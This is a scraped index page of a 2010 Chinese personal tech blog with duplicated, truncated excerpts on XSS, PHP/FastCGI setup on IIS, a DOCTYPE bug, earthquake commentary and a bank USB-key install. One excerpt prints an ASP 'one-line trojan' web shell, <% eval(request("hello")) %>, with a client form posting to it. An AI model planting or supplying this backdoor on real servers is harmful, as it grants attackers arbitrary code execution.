javascript中的XSS跨站攻击
[ 2010-03-03 14:48:15 | 作者: admin ]
随着网络应用的日益广泛,其中的安全问题也越来越不容忽视。作为网络安全中占用重要地位的WEB安全也开始受到人们关注,作为一个好的网络安全维护人员,不仅要有扎实的理论知识,还要有充分的白盒黑盒测试经验,今天我们就从攻击的角度分析下WEB脚本安全中客户端脚本经常出现的攻击方式——跨站攻击(XSS)。
跨站漏洞出现在各个地方,其危害也越来越大,印象中08年在国内就曾掀起了一阵“跨站热”,多家著名网站程序和邮箱都受到了不同程度的攻击。那么跨站漏洞到底是怎么产生的呢?从攻击者的角度看,是攻击者提交的变量没有经过完整过滤Html字符或者根本就没有经过过滤就放到了数据库中,并且在一些地方又直接从数据库中取出来返回给来访问的用户,从而产生了跨站漏洞。而从程序员角度分析,则是由于编写程序时的一些失误,在代码解析成HTML的过程中被人利用,从而被攻击者构造合理的HTML代码闭合后然后就运行攻...
阅读全文…
跨站漏洞出现在各个地方,其危害也越来越大,印象中08年在国内就曾掀起了一阵“跨站热”,多家著名网站程序和邮箱都受到了不同程度的攻击。那么跨站漏洞到底是怎么产生的呢?从攻击者的角度看,是攻击者提交的变量没有经过完整过滤Html字符或者根本就没有经过过滤就放到了数据库中,并且在一些地方又直接从数据库中取出来返回给来访问的用户,从而产生了跨站漏洞。而从程序员角度分析,则是由于编写程序时的一些失误,在代码解析成HTML的过程中被人利用,从而被攻击者构造合理的HTML代码闭合后然后就运行攻...
阅读全文…
DOCTYPE标准与html兼容问题
[ 2010-03-02 10:51:49 | 作者: admin ]
近日发现lbs使用textarea多行文本框的时候,写日志会发生自动滚动的现象,极为恼火,以前的浏览器版本视乎没有这个问题。所以探个究竟,是DOCTYPE 标准惹得祸。
原演示代码如下:
阅读全文…
原演示代码如下:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">
<HTML xmlns="http://www.w3.org/1999/xhtml">
<HEAD>
<TITLE>发表日志 - 拍拍尘土</TITLE>
</HEAD>
<BODY>
<TEXTAREA style="WIDTH: 600px" id=message rows=18 cols=64 name=message ></TEXTAREA>
...<HTML xmlns="http://www.w3.org/1999/xhtml">
<HEAD>
<TITLE>发表日志 - 拍拍尘土</TITLE>
</HEAD>
<BODY>
<TEXTAREA style="WIDTH: 600px" id=message rows=18 cols=64 name=message ></TEXTAREA>
阅读全文…
从中国建造到中国制造
[ 2010-03-02 10:09:20 | 作者: admin ]
当地时间2月27日3时34分,智利发生8.8级地震,震源位于海底59.4公里,地点位于马乌莱地区外海,这是该国50年来遭受最严重的灾难,据第2大城市康塞普西翁100公里。虽然是8.8级的大地震,但是我们看到死亡人数只有700余人,中国人看到这个令人欣慰的数字的同时,是不是更多的是惆怅。
从历届大地震发生的情况来看,死亡数字和经济有着密不可分的关系。
--------------------------------------------------------------------------------------------------------------------------------------------
意大利墨西拿大地震 1908年12月18日5时25分 西西里岛墨西拿市 7.5级 7.5万人
...
阅读全文…
从历届大地震发生的情况来看,死亡数字和经济有着密不可分的关系。
--------------------------------------------------------------------------------------------------------------------------------------------
意大利墨西拿大地震 1908年12月18日5时25分 西西里岛墨西拿市 7.5级 7.5万人
...
阅读全文…
关于FastCGI下PHP无法显示错误信息的问题的解决办法
[ 2010-03-01 16:35:57 | 作者: admin ]
在IIS+FastCGI中配置PHP后,如果php源文件中存在错误,则不论是什么错误,FastCGI都会返回内部服务器错误500的信息,这给程序调试带来了麻烦。解决这个问题的办法如下:
打开PHP的配置文件php.ini,并做如下配置修改:
short_open_tag = On
fastcgi.logging = 0
log_errors = On
error_reporting = E_ALL
error_log = "C:\Windows\Temp\php-errors.log"
需要确保"C:\Windows\Temp"就是系统Temp路径,这样以来如果是PHP组件出现错误,就可以在C:\Windows\Temp\php-errors.log文件中看到错误提示,如果PHP的warning或notice则在浏览器中会看到详细出错信息并且在php-errors.log文件中也可以看到出错信息了。
打开PHP的配置文件php.ini,并做如下配置修改:
short_open_tag = On
fastcgi.logging = 0
log_errors = On
error_reporting = E_ALL
error_log = "C:\Windows\Temp\php-errors.log"
需要确保"C:\Windows\Temp"就是系统Temp路径,这样以来如果是PHP组件出现错误,就可以在C:\Windows\Temp\php-errors.log文件中看到错误提示,如果PHP的warning或notice则在浏览器中会看到详细出错信息并且在php-errors.log文件中也可以看到出错信息了。
IIS6配置PHP5+fastcgi,出现FCGI14001错误解决方法
[ 2010-03-01 15:36:44 | 作者: admin ]
引用
FastCGI Error
The FastCGI Handler was unable to process the request.
--------------------------------------------------------------------------------
Error Details:
Error Number: 14001 (0x800736b1).
Error Description: 由于应用程序配置不正确,应用程序未能启动。重新安装应用程序可能会纠正这个问题。
HTTP Error 500 - Server Error.
Internet Information Services (IIS)
The FastCGI Handler was unable to process the request.
--------------------------------------------------------------------------------
Error Details:
Error Number: 14001 (0x800736b1).
Error Description: 由于应用程序配置不正确,应用程序未能启动。重新安装应用程序可能会纠正这个问题。
HTTP Error 500 - Server Error.
Internet Information Services (IIS)
错误关键在于没有安装VC9运行库 即VISUAL C++ 2008
...
阅读全文…
IIS下PHP的ISAPI和FastCGI比较
[ 2010-02-25 14:53:59 | 作者: admin ]
p.s.推荐使用FastCGI,ISAPI方式需要指定环境变量 PATH 和 PHPRC,不然无法加载php.ini
在Windows IIS 6.0下配置PHP,通常有CGI、ISAPI和FastCGI三种配置方式,这三种模式都可以在IIS 6.0下成功运行,下面我就讲一下这三种方式配置的区别和性能上的差异。
1、CGI(通用网关接口/Common Gateway Interface)一般是可执行程序,例如EXE文件,和WEB服务器各自占据着不同的进程,而且一般一个CGI程序只能处理一个用户请求。这样,当用户请求数量非常多时,会大量占用系统的资源,如内存、CPU时间等,造成效能低下。
2、ISAPI(Internet Server Application Program Interface)是微软提供的一套面向WEB服务的API接口,它能实现CGI提供的全部功能,并在此...
阅读全文…
在Windows IIS 6.0下配置PHP,通常有CGI、ISAPI和FastCGI三种配置方式,这三种模式都可以在IIS 6.0下成功运行,下面我就讲一下这三种方式配置的区别和性能上的差异。
1、CGI(通用网关接口/Common Gateway Interface)一般是可执行程序,例如EXE文件,和WEB服务器各自占据着不同的进程,而且一般一个CGI程序只能处理一个用户请求。这样,当用户请求数量非常多时,会大量占用系统的资源,如内存、CPU时间等,造成效能低下。
2、ISAPI(Internet Server Application Program Interface)是微软提供的一套面向WEB服务的API接口,它能实现CGI提供的全部功能,并在此...
阅读全文…
一句话木马,eval的客户端asp木马
[ 2010-02-25 13:38:54 | 作者: admin ]
网上的eval asp木马,客户端其实还是调用了execute语句,这样比较方便。如果纯用eval 的话,也不难。但是在eval方法中,有些地方要注意。VBS里正确的写法如下:
EVAL(MsgBox ("1")&MsgBox ("2")) 'Eval 方法,表达式
Eval ("msgbox(""1"")&msgbox(""2"")")
Eval "MsgBox (""1"")&vbrlf&MsgBox (""2"")"
Eval MsgBox ("1")&vbrlf&MsgBox ("2")
EVAL后跟的语句有许多限制。这个要仔细体会。明白了这些,我们简单测试:
S端:<% eval(request("hello")) %>
C端:<form action=http://192.168.0.8/2.asp method=post name=form1>
<textarea ...
阅读全文…
EVAL(MsgBox ("1")&MsgBox ("2")) 'Eval 方法,表达式
Eval ("msgbox(""1"")&msgbox(""2"")")
Eval "MsgBox (""1"")&vbrlf&MsgBox (""2"")"
Eval MsgBox ("1")&vbrlf&MsgBox ("2")
EVAL后跟的语句有许多限制。这个要仔细体会。明白了这些,我们简单测试:
S端:<% eval(request("hello")) %>
C端:<form action=http://192.168.0.8/2.asp method=post name=form1>
<textarea ...
阅读全文…
老版本金邦达工行U盾在Win7下的安装使用
[ 2010-02-23 21:30:06 | 作者: admin ]
换了win7,32位的,老版本金邦达U盾不能用了,先是驱动装不上,查过些资料还是没用,只好手工装驱动,完了后,浏览器还是不认,按网友说的改了注册表,就OK了,已经成功支付,故留个记号,方便用得着的人。
1. 装驱动,没用也要装。顺便把控件也装了吧。
上面都在工行个人网银上面,呵呵。
2. 还是装驱动;
1. 看看设置管理器能不能正常认出设备,能正常认出,这一步就免了。我的是不行,只好……上图。插上U盾……..
...
阅读全文…
1. 装驱动,没用也要装。顺便把控件也装了吧。
上面都在工行个人网银上面,呵呵。
2. 还是装驱动;
1. 看看设置管理器能不能正常认出设备,能正常认出,这一步就免了。我的是不行,只好……上图。插上U盾……..
...
阅读全文…
